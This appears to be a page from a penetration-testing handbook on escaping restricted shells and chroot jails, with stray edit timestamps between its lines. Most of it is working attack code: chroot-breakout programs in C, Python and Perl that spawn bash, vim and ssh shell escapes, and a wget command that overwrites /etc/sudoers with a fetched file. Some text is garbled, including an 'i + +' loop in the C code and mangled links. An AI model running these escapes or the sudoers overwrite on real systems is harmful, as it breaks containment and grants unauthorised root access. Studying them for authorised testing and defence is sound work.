2020-07-15 15:43:14 +00:00
# Escaping from restricted shells - Jails
2020-08-26 10:00:51 +00:00
## **GTFOBins**
2020-07-15 15:43:14 +00:00
**Search in** [**https://gtfobins.github.io/** ](https://gtfobins.github.io/ ) **if you can execute any binary with "Shell" property**
2021-01-06 16:24:33 +00:00
## Chroot limitation
From [wikipedia ](https://en.wikipedia.org/wiki/Chroot#Limitations ): The chroot mechanism is **not intended to defend** against intentional tampering by **privileged** \(**root**\) **users** . On most systems, chroot contexts do not stack properly and chrooted programs **with sufficient privileges may perform a second chroot to break out** .
Therefore, if you are **root** inside a chroot you **can escape** creating **another chroot** . However, in several cases inside the first chroot you won't be able to execute the chroot command, therefore you will need to compile a binary like the following one and run it:
{% code title="break\_chroot.c" %}
```c
#include <sys/stat.h>
#include <stdlib.h>
#include <unistd.h>
//gcc break_chroot.c -o break_chroot
int main(void)
{
mkdir("chroot-dir", 0755);
chroot("chroot-dir");
for(int i = 0; i < 1000 ; i + + ) {
chdir("..");
}
chroot(".");
system("/bin/bash");
}
```
{% endcode %}
2021-01-08 19:20:28 +00:00
Using **python** :
2021-01-08 19:04:47 +00:00
```python
#!/usr/bin/python
import os
os.mkdir("chroot-dir")
os.chroot("chroot-dir")
for i in range(1000):
os.chdir("..")
os.chroot(".")
os.system("/bin/bash")
```
2021-01-08 19:20:28 +00:00
Using **perl** :
```perl
#!/usr/bin/perl
mkdir "chroot-dir";
chroot "chroot-dir";
foreach my $i (0..1000) {
chdir ".."
}
chroot ".";
system("/bin/bash");
```
2020-08-26 10:00:51 +00:00
## Modify PATH
2020-07-15 15:43:14 +00:00
Check if you can modify the PATH env variable
```bash
echo $PATH #See the path of the executables that you can use
PATH=/usr/local/sbin:/usr/sbin:/sbin:/usr/local/bin:/usr/bin:/bin #Try to change the path
echo /home/* #List directory
```
2020-12-27 15:10:35 +00:00
## Using vim
```bash
:set shell=/bin/sh
:shell
```
2020-08-26 10:00:51 +00:00
## Create script
2020-07-15 15:43:14 +00:00
Check if you can create an executable file with _/bin/bash_ as content
```bash
red /bin/bash
> w wx/path #Write /bin/bash in a writable and executable path
```
2020-08-26 10:00:51 +00:00
## Get bash from SSH
2020-07-15 15:43:14 +00:00
2020-08-26 02:46:43 +00:00
If you are accessing via ssh you can use this trick to execute a bash shell:
2020-07-15 15:43:14 +00:00
```bash
ssh -t user@< IP > bash # Get directly an interactive shell
```
2021-01-06 16:24:33 +00:00
## Wget
You can overwrite for example sudoers file
```bash
wget http://127.0.0.1:8080/sudoers -O /etc/sudoers
```
2020-08-26 10:00:51 +00:00
## Other tricks
2020-07-15 15:43:14 +00:00
2020-12-27 15:02:07 +00:00
[**https://fireshellsecurity.team/restricted-linux-shell-escaping-techniques/** ](https://fireshellsecurity.team/restricted-linux-shell-escaping-techniques/ )
2021-01-06 16:24:33 +00:00
[https://pen-testing.sans.org/blog/2012/0**b**6/06/escaping-restricted-linux-shells ](https://pen-testing.sans.org/blog/2012/06/06/escaping-restricted-linux-shells**]%28https://pen-testing.sans.org/blog/2012/06/06/escaping-restricted-linux-shells )
2020-12-27 15:02:07 +00:00
[https://gtfobins.github.io ](https://gtfobins.github.io**]%28https://gtfobins.github.io )
2021-01-06 16:24:33 +00:00
**It could also be interesting the page:**
{% page-ref page="../useful-linux-commands/bypass-bash-restrictions.md" %}
2020-07-15 15:43:14 +00:00